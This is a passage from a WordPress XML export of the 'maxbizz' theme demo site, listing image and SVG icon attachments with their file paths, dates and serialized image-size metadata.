		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:31:"2020/09/bg2-service-detail2.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:31:"bg2-service-detail2-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"bg2-service-detail2-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg2-service-detail2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg2-service-detail2-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:32:"bg2-service-detail2-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg2-service-detail2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg2-service-detail2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>energy</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/energy/</link>
		<pubDate>Thu, 17 Sep 2020 08:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/energy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>980</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[energy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/energy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/energy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/bg1-service-detail3/</link>
		<pubDate>Thu, 17 Sep 2020 08:48:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>982</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:48:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:48:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:420;s:4:"file";s:31:"2020/09/bg1-service-detail3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail3-300x145.jpg";s:5:"width";i:300;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"bg1-service-detail3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"bg1-service-detail3-768x371.jpg";s:5:"width";i:768;s:6:"height";i:371;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"bg1-service-detail3-600x420.jpg";s:5:"width";i:600;s:6:"height";i:420;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/image2-home1/</link>
		<pubDate>Tue, 22 Sep 2020 04:38:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1026</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:38:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:38:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image2-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:660;s:4:"file";s:24:"2020/09/image2-home1.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home1-300x264.jpg";s:5:"width";i:300;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"image2-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"image2-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>our-vision</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/our-vision/</link>
		<pubDate>Tue, 22 Sep 2020 04:46:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/our-vision.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1029</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 04:46:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 04:46:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-vision]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/our-vision.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/our-vision.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:22:"2020/09/our-vision.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:22:"our-vision-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"our-vision-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"our-vision-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:22:"our-vision-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"our-vision-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/image1-home1/</link>
		<pubDate>Wed, 30 Sep 2020 08:32:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1087</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 08:32:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 08:32:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-home1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:696;s:6:"height";i:650;s:4:"file";s:24:"2020/09/image1-home1.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-home1-300x280.png";s:5:"width";i:300;s:6:"height";i:280;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:24:"image1-home1-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"image1-home1-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/bg1-home1/</link>
		<pubDate>Wed, 30 Sep 2020 09:29:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1106</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 09:29:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 09:29:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:21:"2020/09/bg1-home1.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home1-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home1-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home1-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home1-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>fservice1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/fservice1/</link>
		<pubDate>Wed, 30 Sep 2020 10:09:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/fservice1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1114</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:09:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:09:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fservice1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/fservice1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/fservice1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:745;s:4:"file";s:21:"2020/09/fservice1.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"fservice1-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"fservice1-1024x397.jpg";s:5:"width";i:1024;s:6:"height";i:397;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"fservice1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"fservice1-768x298.jpg";s:5:"width";i:768;s:6:"height";i:298;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"fservice1-1536x596.jpg";s:5:"width";i:1536;s:6:"height";i:596;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"fservice1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture"